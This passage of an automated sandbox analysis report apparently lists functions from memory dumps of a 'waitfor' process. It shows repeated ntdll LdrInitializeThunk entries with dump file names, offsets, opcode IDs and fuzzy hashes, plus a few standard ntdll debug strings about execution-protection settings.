                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                                                                                                                                • Instruction ID: 5ee05724c9033449de5c4fa94b028e61a70db692b3ace4404221404f8aad6e74
                                                                                                                                                                                • Opcode Fuzzy Hash: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                                                                                                                                • Instruction Fuzzy Hash: CD90022922300402D5807158558860B10968BE1202FD2D819A4005558CCD65886A6325
                                                                                                                                                                                Function 05202CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 151 5202cf0-5202cfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                                                                                                                                • Instruction ID: e40550c31c5cb1b014ba43387f3b0215cd0c56fcc8ac08adb51e62e216fd85c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                                                                                                                                • Instruction Fuzzy Hash: 35900221252045525945B158458450750979BF0241BD2C416A5404950CC9769857E625
                                                                                                                                                                                Function 05202F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                                                                                                                                • Instruction ID: 7e82da6391b80e601e0b8cc97fe033890d0bd56b3069326c0d25f0a4553f7318
                                                                                                                                                                                • Opcode Fuzzy Hash: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                                                                                                                                • Instruction Fuzzy Hash: A490022122180442D60065684D94B0710968BE0303F92C519A4144554CCD6588626525
                                                                                                                                                                                Function 05202E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                                                                                                                                • Instruction ID: 1f35bcc8f715d3eec907510a8857f07b7bc95dd957130c554ae4e54037b368e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A90026135100842D50061584594B071096CBF1301F92C419E5054554DCA69CC53712A
                                                                                                                                                                                Function 052029F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 141 52029f0-52029fc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                                                                                                                                • Instruction ID: 97dc27476585df236e42d7f8009e130256cbe587936cfca9309cc9b120d3550e
                                                                                                                                                                                • Opcode Fuzzy Hash: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                                                                                                                                • Instruction Fuzzy Hash: 55900225221004030505A558078450710D78BE5351792C425F5005550CDA7188626125
                                                                                                                                                                                Function 05202B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 145 5202b00-5202b0c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                                                                                                                                • Instruction ID: 79db5b3cb3ad280e5f22248d264afbcae34e65fcf786a8a909b789cb696b03b0
                                                                                                                                                                                • Opcode Fuzzy Hash: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                                                                                                                                • Instruction Fuzzy Hash: FF90023121504C42D54071584584A4710A68BE0305F92C415A4054694DDA758D56B665
                                                                                                                                                                                Function 05202B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 146 5202b10-5202b1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fdb60f20c0e028bae837bbfd860fd9525116fe4afca68c821f634693a5516ba9
                                                                                                                                                                                • Instruction ID: 7e17f2942ee0c0b65f6b507d1f745e42aa38a5a294123b8b0eb077b97a85a17d
                                                                                                                                                                                • Opcode Fuzzy Hash: fdb60f20c0e028bae837bbfd860fd9525116fe4afca68c821f634693a5516ba9
                                                                                                                                                                                • Instruction Fuzzy Hash: 2890023121100C02D5807158458464B10968BE1301FD2C419A4015654DCE658A5A77A5
                                                                                                                                                                                Function 05202B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 147 5202b80-5202b8c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: eed08dfc9e58b0fedd10c623c0b33986b4277077c3cc5c42ee6cfacea8ae5547
                                                                                                                                                                                • Instruction ID: 127e0515ccf8800dc92144452d493a2328c94ad49d96b58b7370ec2bd875c04b
                                                                                                                                                                                • Opcode Fuzzy Hash: eed08dfc9e58b0fedd10c623c0b33986b4277077c3cc5c42ee6cfacea8ae5547
                                                                                                                                                                                • Instruction Fuzzy Hash: 1190023121100C42D50061584584B4710968BF0301F92C41AA4114654DCA65C8527525
                                                                                                                                                                                Function 05202B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 148 5202b90-5202b9c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 72a73bb5cbf2047cf9dde0cbfddf03ffe4e716436d49c37ea29f0752bf825b94
                                                                                                                                                                                • Instruction ID: a8a877c429b9ebf04bef8f493360cdd7688f7d75a66cfb461ec42a1487114a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 72a73bb5cbf2047cf9dde0cbfddf03ffe4e716436d49c37ea29f0752bf825b94
                                                                                                                                                                                • Instruction Fuzzy Hash: 8390023121108C02D5106158858474B10968BE0301F96C815A8414658DCAE588927125
                                                                                                                                                                                Function 05202BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 149 5202bc0-5202bcc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: f75cef70d88e93de9493d172a15dcb4675ace0aa7a2014eae244d483edab2a7f
                                                                                                                                                                                • Instruction ID: 1751cad67316476881a60905789203ac61ff16ea98c63bbfa475adb21ad8e233
                                                                                                                                                                                • Opcode Fuzzy Hash: f75cef70d88e93de9493d172a15dcb4675ace0aa7a2014eae244d483edab2a7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D90023121100802D5006598558864710968BF0301F92D415A9014555ECAB588927135
                                                                                                                                                                                Function 05202A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 142 5202a10-5202a1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 40fa58e1bc029964f33cac9d419a67696e6f79186068b601742163a1565772c5
                                                                                                                                                                                • Instruction ID: da73d9008f7c1360b81d8fcac43ec342677065307f9920c5c7743eab50ae256e
                                                                                                                                                                                • Opcode Fuzzy Hash: 40fa58e1bc029964f33cac9d419a67696e6f79186068b601742163a1565772c5
                                                                                                                                                                                • Instruction Fuzzy Hash: B7900225231004020545A558078450B14D69BE63517D2C419F5406590CCA7188666325
                                                                                                                                                                                Function 05202A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 143 5202a80-5202a8c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 8b764f595f4c89acfb9a1886d17b6da8c8f069f5e38126629b816d1030ec30ae
                                                                                                                                                                                • Instruction ID: e9514cdb9d50b62101978946cd0577b9e5b09e7079e826dcc99d0acb75dc1f40
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b764f595f4c89acfb9a1886d17b6da8c8f069f5e38126629b816d1030ec30ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 2190026121200403450571584594617509B8BF0201F92C425E5004590DC97588927129
                                                                                                                                                                                Function 05202AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 144 5202ac0-5202acc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: ebe4c512541e511408aa513ff88961452375362e006d69be07206dd5458fa0a6
                                                                                                                                                                                • Instruction ID: f3468135c6ec9b23786cce8881ee06f954bb1a8961d03e0b00ebb87c29d9a168
                                                                                                                                                                                • Opcode Fuzzy Hash: ebe4c512541e511408aa513ff88961452375362e006d69be07206dd5458fa0a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 4990023161500C02D5507158459474710968BE0301F92C415A4014654DCBA58A5676A5
                                                                                                                                                                                Function 05202B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 137 5202b2a-5202b2f 138 5202b31-5202b38 137->138 139 5202b3f-5202b46 LdrInitializeThunk 137->139
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 0e3d10042694b31c280a05775a6cb22d9a3da217d0fed2ef8a9c1df4ffe5ccf9
                                                                                                                                                                                • Instruction ID: b90b2ff5e5d1132ae27c0a5444ae3dd7f1fd7c3eb64afb26a240f266c814e523
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e3d10042694b31c280a05775a6cb22d9a3da217d0fed2ef8a9c1df4ffe5ccf9
                                                                                                                                                                                • Instruction Fuzzy Hash: 02B09B71D124C5C5DB11E760474CB2779517FD0701F56C456D1460685F4778C091F175

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 050804CE Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482449989.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5080000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
                                                                                                                                                                                • Instruction ID: 34f3accf81b0d277154dc6660f480bce0898dbc72cca9a63e74e3e70a615b28d
                                                                                                                                                                                • Opcode Fuzzy Hash: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C41D671618B0D8FD768BE68E095ABBB3E6FB55300F50052DD9C6C3252EA70E84A8685
                                                                                                                                                                                Function 051F7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05234507
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0523454D
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05234460
                                                                                                                                                                                • ExecuteOptions, xrefs: 052344AB
                                                                                                                                                                                • Execute=1, xrefs: 0523451E
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05234592
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05234530
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                                                                                                                                • Instruction ID: 201c0e91a386596d8dfc0347bee0e40e5ab51498a61b10d98bb2a6b83c3fa0da
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                                                                                                                                • Instruction Fuzzy Hash: C6510971B502197AEF25EA94EC8DFB973A9FF08310F0404A9E606A71D1EB709E45CF90
                                                                                                                                                                                Function 051C9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                                                                                                                                • Instruction ID: b168b05dcd8fb62eabb19220defcc3c85d1e1f4307f2fea95f47c7711445ec2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                                                                                                                                • Instruction Fuzzy Hash: 89811A75D10269DBDB35CB54CC45BEEBAB8AF48710F0041EAE90AB7290D7719E85CFA0